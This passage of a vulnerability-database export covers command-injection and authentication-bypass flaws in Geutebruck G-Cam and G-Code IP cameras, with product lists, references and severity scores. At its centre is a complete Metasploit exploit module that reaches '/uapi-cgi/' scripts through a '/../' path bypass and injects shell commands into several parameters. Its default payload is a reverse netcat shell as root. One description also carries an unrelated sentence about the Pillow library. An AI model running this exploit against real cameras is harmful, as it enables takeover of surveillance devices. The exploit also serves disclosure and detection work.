          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-78",
            "trust": 1.0
          },
          {
            "problemtype": "Command injection (CWE-77) [ Other ]",
            "trust": 0.8
          },
          {
            "problemtype": " Stack-based buffer overflow (CWE-121) [ Other ]",
            "trust": 0.8
          },
          {
            "problemtype": " Lack of authentication for important features (CWE-306) [ Other ]",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33544"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.2,
            "url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03"
          },
          {
            "trust": 1.6,
            "url": "https://www.randorisec.fr/fr/udp-technology-ip-camera-vulnerabilities/"
          },
          {
            "trust": 0.8,
            "url": "https://jvn.jp/vu/jvnvu97817785/"
          },
          {
            "trust": 0.8,
            "url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-208-05"
          },
          {
            "trust": 0.7,
            "url": "https://packetstormsecurity.com/files/164036/geutebruck-remote-command-execution.html"
          },
          {
            "trust": 0.7,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33544"
          },
          {
            "trust": 0.6,
            "url": "https://www.auscert.org.au/bulletins/esb-2021.2550"
          },
          {
            "trust": 0.6,
            "url": "https://www.cybersecurity-help.cz/vdb/sb2021072807"
          },
          {
            "trust": 0.6,
            "url": "https://cxsecurity.com/issue/wlb-2021090031"
          },
          {
            "trust": 0.6,
            "url": "https://www.cybersecurity-help.cz/vdb/sb2021041363"
          },
          {
            "trust": 0.1,
            "url": "https://ieeexplore.ieee.org/abstract/document/10769424"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33543"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33553"
          },
          {
            "trust": 0.1,
            "url": "https://github.com/rapid7/metasploit-framework"
          },
          {
            "trust": 0.1,
            "url": "https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/"
          },
          {
            "trust": 0.1,
            "url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33554"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33551"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33548"
          },
          {
            "trust": 0.1,
            "url": "https://metasploit.com/download"
          },
          {
            "trust": 0.1,
            "url": "http://geutebruck.com"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33550"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33552"
          }
        ],
        "sources": [
          {
            "db": "OTHER",
            "id": null
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33544"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "PACKETSTORM",
            "id": "164036"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2093"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33544"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "OTHER",
            "id": null
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33544"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "PACKETSTORM",
            "id": "164036"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2093"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33544"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2021-07-29T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "date": "2021-09-02T15:36:40",
            "db": "PACKETSTORM",
            "id": "164036"
          },
          {
            "date": "2021-07-27T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202107-2093"
          },
          {
            "date": "2021-04-13T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "date": "2021-09-13T18:15:21.130000",
            "db": "NVD",
            "id": "CVE-2021-33544"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2021-07-29T08:30:00",
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "date": "2022-10-08T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202107-2093"
          },
          {
            "date": "2021-04-14T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "date": "2023-11-07T03:35:51.497000",
            "db": "NVD",
            "id": "CVE-2021-33544"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "PACKETSTORM",
            "id": "164036"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2093"
          }
        ],
        "trust": 0.7
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Multiple vulnerabilities in GEUTEBRUCK G-Cam E2 and G-Code",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "operating system command injection",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2093"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202109-0860

    Vulnerability from variot - Updated: 2025-01-30 21:08

    Multiple camera devices by UDP Technology, Geutebrück and other vendors are vulnerable to command injection, which may allow an attacker to remotely execute arbitrary code. The following vulnerabilities exist in G-Cam E2 and G-Code, provided by GEUTEBRUCK:

    * Missing authentication for a critical function (CWE-306) - CVE-2021-33543
    * Command injection (CWE-77) - CVE-2021-33544, CVE-2021-33548, CVE-2021-33550, CVE-2021-33551, CVE-2021-33552, CVE-2021-33553, CVE-2021-33554
    * Stack-based buffer overflow (CWE-121) - CVE-2021-33545, CVE-2021-33546, CVE-2021-33547, CVE-2021-33549

    The expected impact depends on the vulnerability and may be as follows:

    * A remote third party steals confidential information because of improper default user authentication settings - CVE-2021-33543
    * A remote third party executes arbitrary code through command injection - CVE-2021-33544, CVE-2021-33548, CVE-2021-33550, CVE-2021-33551, CVE-2021-33552, CVE-2021-33553, CVE-2021-33554
    * A remote third party triggers a buffer overflow in the counter parameter and executes arbitrary code - CVE-2021-33545
    * A remote third party triggers a buffer overflow in the name parameter and executes arbitrary code - CVE-2021-33546
    * A remote third party triggers a buffer overflow in the profile parameter and executes arbitrary code - CVE-2021-33547
    * A remote third party triggers a buffer overflow in the action parameter and executes arbitrary code - CVE-2021-33549

    Pillow is a Python-based image processing library. There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements. [The Pillow sentence does not describe the camera products above; it appears to have been merged in from a different upstream entry.]

    ##

    This module requires Metasploit: https://metasploit.com/download

    Current source: https://github.com/rapid7/metasploit-framework

    # Metasploit remote-exploit module for the Geutebruck G-Cam / G-Code
    # command-injection CVEs listed under 'References'.
    #
    # Notes for defenders reading this listing:
    # - Every target 'uri' begins with '/../uapi-cgi/'. The module description
    #   states that the HTTP basic authentication protecting /uapi-cgi/ is
    #   bypassed, so a request path containing '/../uapi-cgi/' is worth alerting
    #   on. (Presumably this is the CVE-2021-33543 part of the chain - confirm
    #   against the CISA advisory linked in 'References'.)
    # - Six of the seven targets wrap the injected value in '$( )'. Shell
    #   command-substitution syntax inside a CGI query parameter is a second
    #   indicator; testcmd.cgi receives the command value directly.
    # - The description calls the injection flaws "authenticated", yet the
    #   requests built here set no credentials. A severity score that assumes
    #   high privileges may therefore understate exposure for a device that is
    #   reachable from an untrusted network.
    class MetasploitModule < Msf::Exploit::Remote
      Rank = ExcellentRanking
      include Msf::Exploit::Remote::HttpClient
      include Msf::Exploit::CmdStager
      # AutoCheck is prepended; presumably it runs #check before #exploit - confirm
      # against the framework documentation.
      prepend Msf::Exploit::Remote::AutoCheck

      # Registers the module metadata: affected products and firmware versions,
      # CVE references, the per-CVE target table, and the default payload.
      def initialize(info = {})
        super(
          update_info(
            info,
            'Name' => 'Geutebruck Multiple Remote Command Execution',
            'Description' => %q{ This module bypasses the HTTP basic authentication used to access the /uapi-cgi/ folder and exploits multiple authenticated arbitrary command execution vulnerabilities within the parameters of various pages on Geutebruck G-Cam EEC-2xxx and G-Code EBC-21xx, EFD-22xx, ETHC-22xx, and EWPC-22xx devices running firmware versions <= 1.12.0.27 as well as firmware versions 1.12.13.2 and 1.12.14.5. Successful exploitation results in remote code execution as the root user. },

            'Author' => [
              'Titouan Lazard', # Of RandoriSec - Discovery
              'Ibrahim Ayadhi', # Of RandoriSec - Discovery and Metasploit Module
              'Sébastien Charbonnier' # Of RandoriSec - Metasploit Module
            ],
            'License' => MSF_LICENSE,
            'References' => [
              ['CVE', '2021-33543'],
              ['CVE', '2021-33544'],
              ['CVE', '2021-33548'],
              ['CVE', '2021-33550'],
              ['CVE', '2021-33551'],
              ['CVE', '2021-33552'],
              ['CVE', '2021-33553'],
              ['CVE', '2021-33554'],
              [ 'URL', 'http://geutebruck.com' ],
              [ 'URL', 'https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/'],
              [ 'URL', 'https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03']
            ],
            'DisclosureDate' => '2021-07-08',
            'Privileged' => true,
            'Platform' => ['unix', 'linux'],
            'Arch' => [ARCH_CMD],
            # One entry per CVE. Each names the CGI script ('uri'), the HTTP method
            # and the query parameters; the value holding PLACEHOLDER_CMD is the
            # one #exploit rewrites. The Rex::Text.rand_text_* fillers are random,
            # so they are not stable values to build a detection on - the URI
            # prefix and the '$(' sequence are.
            'Targets' => [
              [
                'CVE-2021-33544 - certmngr.cgi', {
                  'http_method' => 'GET',
                  'http_vars' => {
                    'action' => 'createselfcert',
                    'local' => Rex::Text.rand_text_alphanumeric(10..16),
                    'country' => Rex::Text.rand_text_alphanumeric(2),
                    'state' => '$(PLACEHOLDER_CMD)',
                    'organization' => Rex::Text.rand_text_alphanumeric(10..16),
                    'organizationunit' => Rex::Text.rand_text_alphanumeric(10..16),
                    'commonname' => Rex::Text.rand_text_alphanumeric(10..16),
                    'days' => Rex::Text.rand_text_numeric(2..4),
                    'type' => Rex::Text.rand_text_numeric(2..4)
                  },
                  'uri' => '/../uapi-cgi/certmngr.cgi'
                }
              ],
              [
                'CVE-2021-33548 - factory.cgi', {
                  'http_method' => 'GET',
                  'http_vars' => { 'preserve' => '$(PLACEHOLDER_CMD)' },
                  'uri' => '/../uapi-cgi/factory.cgi'
                }
              ],
              [
                'CVE-2021-33550 - language.cgi', {
                  'http_method' => 'GET',
                  'http_vars' => { 'date' => '$(PLACEHOLDER_CMD)' },
                  'uri' => '/../uapi-cgi/language.cgi'
                }
              ],
              [
                'CVE-2021-33551 - oem.cgi', {
                  'http_method' => 'GET',
                  'http_vars' => {
                    'action' => 'set',
                    'enable' => 'yes',
                    'environment.lang' => '$(PLACEHOLDER_CMD)'
                  },
                  'uri' => '/../uapi-cgi/oem.cgi'
                }
              ],
              [
                'CVE-2021-33552 - simple_reclistjs.cgi', {
                  'http_method' => 'GET',
                  'http_vars' => {
                    'action' => 'get',
                    'timekey' => Rex::Text.rand_text_numeric(2..4),
                    'date' => '$(PLACEHOLDER_CMD)'
                  },
                  'uri' => '/../uapi-cgi/simple_reclistjs.cgi'
                }
              ],
              [
                'CVE-2021-33553 - testcmd.cgi', {
                  'http_method' => 'GET',
                  'http_vars' => { 'command' => 'PLACEHOLDER_CMD' },
                  'uri' => '/../uapi-cgi/testcmd.cgi'
                }
              ],
              [
                'CVE-2021-33554 - tmpapp.cgi', {
                  'http_method' => 'GET',
                  'http_vars' => { 'appfile.filename' => '$(PLACEHOLDER_CMD)' },
                  'uri' => '/../uapi-cgi/tmpapp.cgi'
                }
              ]
            ],
            'DefaultTarget' => 0,
            # The default payload name indicates a reverse shell, i.e. the camera
            # would open an outbound connection; egress filtering on the camera
            # network segment limits that.
            'DefaultOptions' => {
              'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping'
            },
            # The module itself declares that it leaves artifacts on disk, which is
            # relevant when examining a device suspected of compromise.
            'Notes' => {
              'Stability' => ['CRASH_SAFE'],
              'Reliability' => ['REPEATABLE_SESSION'],
              'SideEffects' => ['ARTIFACTS_ON_DISK']
            }
          )
        )
      end

      # Reads the firmware version the device reports in /brand.xml.
      #
      # Returns the first substring of the <firmware> element that matches
      # d.d{1,3}.d{1,3}.d{1,3} (the first component is a single digit), or
      # false when the request fails, the body is empty, the element is missing,
      # or the text holds no such version string. The request built here carries
      # no credentials, so a device that answers it discloses its firmware level.
      def firmware
        res = send_request_cgi(
          'method' => 'GET',
          'uri' => '/brand.xml'
        )
        unless res
          print_error('Connection failed!')
          return false
        end

        unless res&.body && !res.body.empty?
          print_error('Empty body in the response!')
          return false
        end

        res_xml = res.get_xml_document
        if res_xml.at('//firmware').nil?
          print_error('Target did not respond with a XML document containing the "firmware" element!')
          return false
        end
        raw_text = res_xml.at('//firmware').text
        if raw_text && raw_text.match(/\d\.\d{1,3}\.\d{1,3}\.\d{1,3}/)
          raw_text.match(/\d\.\d{1,3}\.\d{1,3}\.\d{1,3}/)[0]
        else
          print_error('Target responded with a XML document containing the "firmware" element but its not a valid version string!')
          false
        end
      end

      # Version-based check; it sends nothing beyond the /brand.xml request made
      # by #firmware.
      #
      # Returns CheckCode::Unknown when no version could be read,
      # CheckCode::Appears for firmware <= 1.12.0.27 or exactly 1.12.13.2 or
      # 1.12.14.5, and CheckCode::Safe otherwise. This is a string comparison on
      # what the device reports, not proof that a given device is patched.
      def check
        version = firmware
        if version == false
          return CheckCode::Unknown('Target did not respond with a valid XML response that we could retrieve the version from!')
        end

        rex_version = Rex::Version.new(version)
        vprint_status("Found Geutebruck version #{rex_version}")
        if rex_version <= Rex::Version.new('1.12.0.27') || rex_version == Rex::Version.new('1.12.13.2') || rex_version == Rex::Version.new('1.12.14.5')
          return CheckCode::Appears
        end

        CheckCode::Safe
      end

      # Builds a single HTTP request from the selected target entry and sends it.
      #
      # The target's 'http_method' decides whether the parameters travel as
      # 'vars_get' or 'vars_post'; every target defined above uses GET, so the
      # injected value appears in the request line and in web-server access logs
      # that record the query string.
      def exploit
        print_status("#{rhost}:#{rport} - Setting up request...")

        method = target['http_method']
        if method == 'GET'
          http_method_vars = 'vars_get'
        else
          http_method_vars = 'vars_post'
        end

        http_vars = target['http_vars']
        http_vars.each do |(k, v)|
          if v.include? 'PLACEHOLDER_CMD'
            # Replaces the marker inside the stored string, in place.
            http_vars[k]['PLACEHOLDER_CMD'] = payload.encoded
          end
        end

        print_status("Sending CMD injection request to #{rhost}:#{rport}")
        send_request_cgi(
          {
            'method' => method,
            'uri' => target['uri'],
            http_method_vars => http_vars
          }
        )
        # The response is not inspected; this message is printed unconditionally.
        print_status('Exploit complete, you should get a shell as the root user!')
      end
    end


    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202109-0860",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "g-code een-2010",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ebc-2110",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ebc-2112",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam efd-2250",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2275",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-code een-2040",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2271",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ebc-2111",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ethc-2239",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ethc-2230",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ethc-2249",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-code een-2010",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam efd-2241",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ebc-2110",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-code een-2040",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ewpc-2271",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ebc-2111",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ethc-2239",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam efd-2250",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ethc-2249",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ethc-2230",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2270",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-code eec-2400",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-code een-2010",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam efd-2241",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ethc-2240",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam efd-2251",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ethc-2230",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam efd-2241",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-code eec-2400",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2270",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ethc-2249",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-code eec-2400",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ethc-2240",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam efd-2251",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2275",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ebc-2112",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ewpc-2270",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ewpc-2275",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ebc-2110",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam efd-2250",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam efd-2251",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ethc-2240",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-code een-2040",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ebc-2112",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2271",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ebc-2111",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ethc-2239",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "\u2025 * firmware    1.12.13.2    1.12.14.5"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* een-20xx"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* efd-22xx"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* ethc-22xx"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "\u2025 * g-cam"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* eec-2xx"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "works with the above firmware  s  e2 series camera models   encoders"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": null
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* ebc-21xx"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "\u2025 * g-code"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "( multiple products )"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* ewpc-22xx"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33551"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Titouan Lazard and Ibrahim Ayadhi from RandoriSec reported these vulnerabilities to CISA.",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2086"
          }
        ],
        "trust": 0.6
      },
      "cve": "CVE-2021-33551",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "PARTIAL",
                "baseScore": 6.5,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 8.0,
                "id": "CVE-2021-33551",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 1.0,
                "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 7.2,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 1.2,
                "id": "CVE-2021-33551",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "HIGH",
                "scope": "UNCHANGED",
                "trust": 2.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "OTHER",
                "availabilityImpact": "High",
                "baseScore": 7.2,
                "baseSeverity": "High",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "JVNDB-2021-002023",
                "impactScore": null,
                "integrityImpact": "High",
                "privilegesRequired": "High",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
